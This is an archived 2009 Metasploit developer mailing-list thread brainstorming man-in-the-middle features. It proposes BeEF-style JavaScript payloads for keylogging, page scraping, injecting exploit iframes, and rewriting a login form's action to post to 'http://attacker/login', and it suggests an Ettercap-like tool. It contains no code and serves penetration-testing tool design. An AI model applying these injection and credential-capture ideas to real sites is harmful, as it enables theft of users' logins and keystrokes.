Re: [framework-hackers] MITM Capabilities

2009-02-18 Thread natron
I've thought several times how helpful it would be to hook with
something similar to BeEF.  Let you have multiple 'sessions' in the
background that you could pipe various exploits/aux mods to.  I really
like the idea of BeEF, but haven't found it incredibly useful in
real-world pentesting scenarios.  I wrote some BeEF modules that would
inject iframes pointed to msf / etc, but that was more of a novelty
than anything else.  (You can still do the same thing normally.)

Perhaps just creating a generic javascript/html 'exploit' that merely
exposed a new set of BeEF-like payloads would work.  The payload
handlers would let you have dynamic control of various javascript
functions that we could build to do things like:

- iframe to existing exploits of your choosing
- keylog
- page scraping
- find-and-replace kinds of things (like changing FORM
action=https://blah.com/login; method=POST to FORM
action=http://attacker/login; method=POST)
- custom javascript

Any other ideas?

On Tue, Feb 17, 2009 at 5:34 PM, Patrick Webster patr...@aushack.com wrote:
 Anything specific in mind? :)

 -Patrick
 ___
 Framework-Hackers mailing list
 Framework-Hackers@spool.metasploit.com
 http://spool.metasploit.com/mailman/listinfo/framework-hackers



Re: [framework-hackers] MITM Capabilities

2009-02-18 Thread Bryan Richardson
I was thinking something along the lines of a stripped down Ettercap that
had a control protocol associated with it.

On Tue, Feb 17, 2009 at 4:34 PM, Patrick Webster patr...@aushack.com wrote:

 Anything specific in mind? :)

 -Patrick
